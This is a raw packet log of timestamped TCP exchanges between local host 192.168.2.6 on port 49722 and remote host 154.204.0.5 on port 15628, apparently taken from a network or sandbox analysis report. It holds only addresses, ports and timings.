Jul 20, 2024 16:31:38.745513916 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.750616074 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.753964901 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.759615898 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.761617899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.766922951 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.769649982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.775010109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.778079987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.784665108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.785778999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.790818930 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.793623924 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.798696041 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.799024105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.803905964 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.804090023 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.811331987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.811404943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.824080944 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.824397087 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.831126928 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.831319094 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.836976051 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.837294102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.843004942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.845654011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.852344036 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.853458881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.858464956 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.861758947 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.867054939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.869843006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.875206947 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.877768040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.882688999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.882869005 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.888837099 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.889067888 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.913914919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.921529055 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.921788931 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.926709890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.929626942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.943767071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.943878889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.948926926 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.949244022 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.954298973 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.954606056 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.959618092 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.959758997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.964848995 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.965075970 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.969926119 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.970257044 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.975123882 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.975377083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.980351925 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.980508089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.990681887 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.991871119 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:38.996813059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:38.997407913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.002988100 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.003209114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.008198023 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.008479118 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.013508081 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.013928890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.020142078 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.020420074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.025599003 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.025873899 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.031203032 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.031506062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.036550999 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.037324905 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.042126894 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.042790890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.048346043 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.048531055 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.053967953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.054125071 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.064127922 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.064310074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.074353933 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.074511051 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.080207109 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.080401897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.085593939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.085712910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.090765953 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.090848923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.096446037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.096539021 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.101327896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.101500034 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.106762886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.106857061 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.112328053 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.112422943 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.117429018 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.117755890 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.123375893 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.124337912 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.146286011 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.149147987 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.151813030 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.156136990 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.163018942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.163240910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.170427084 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.170613050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.176280975 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.176505089 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.182774067 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.183335066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.188359022 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.188513994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.193542957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.194094896 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.204524994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.204886913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.229496002 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.245304108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.245645046 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.250773907 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.253629923 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.262610912 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.265642881 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.271426916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.273699999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.279639006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.281620979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.287276983 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.289589882 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.294823885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.297550917 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.303571939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.305905104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.326905012 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.329725981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.338110924 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.341634989 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.351342916 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.353605986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.358859062 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.361746073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.371378899 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.373599052 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.378659010 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.381587982 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.389369965 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.389528036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.394444942 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.397599936 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.402556896 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.402740955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.408917904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.409574986 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.414661884 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.417570114 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.428158998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.429558992 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.434983015 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.437650919 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.443222046 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.445574045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.451116085 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.453619957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.461142063 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.461627960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.472004890 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.473654985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.479197025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.479334116 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.518254042 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.540472984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.540555954 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.543375969 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.543457985 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.554269075 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.554337978 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.568348885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.568428993 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.573494911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.573559999 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.578840017 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.578898907 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.588578939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.588646889 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.594058037 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.594119072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.599234104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.599287987 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.604286909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.604348898 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.610037088 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.610090971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.615289927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.615339994 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.620774031 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.620831966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.629726887 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.629802942 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.635150909 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.635210037 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.640367985 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.640418053 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.648175955 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.648237944 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.653105974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.653167009 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.659071922 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.659126043 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.664180040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.664246082 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.669473886 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.669526100 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.674479961 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.674530029 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.679573059 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.679625988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.684528112 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.684582949 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.689430952 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.689482927 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.694519997 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.694571018 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.701095104 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.701157093 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.706125021 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.706182957 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.716697931 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.716756105 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.721826077 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.721880913 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.726974010 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.727026939 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.731941938 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.731992006 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.736872911 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.736921072 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.741871119 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.741925955 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.748163939 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.748224020 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.756575108 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.756632090 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.762104034 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.762154102 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.767328024 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.767379045 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.772298098 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.772357941 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.780472994 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.780539036 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.788393974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.788451910 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.795005083 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.795068979 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.800580025 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.800638914 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.808578014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.808639050 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.818193913 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.818254948 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.823116064 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.823179960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.831701040 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.831762075 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.842277050 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.842338085 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.847243071 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.847301960 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.852596998 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.852652073 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.857592106 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.857645988 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.862838984 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.862895966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.868592978 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.868695974 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.876131058 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.876188040 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.900389910 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.900463104 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.915062904 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.915143967 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.920850992 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.920912981 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.925832033 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.925888062 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.931370974 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.931425095 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.936567068 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.936619997 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.942070961 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.942128897 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.947201014 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.947263956 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.952126026 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.952183008 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.957459927 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.957575083 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.962949991 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.963001966 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.968195915 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.968244076 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.973845959 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.973903894 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.986677885 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.986741066 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.992060900 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.992119074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:39.997020006 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:39.997070074 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.002285957 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.002341032 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.013505936 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.013566971 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.020525932 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.020613909 CEST	49722	15628	192.168.2.6	154.204.0.5
Jul 20, 2024 16:31:40.029253960 CEST	15628	49722	154.204.0.5	192.168.2.6
Jul 20, 2024 16:31:40.029315948 CEST	49722	15628	192.168.2.6	154.204.0.5
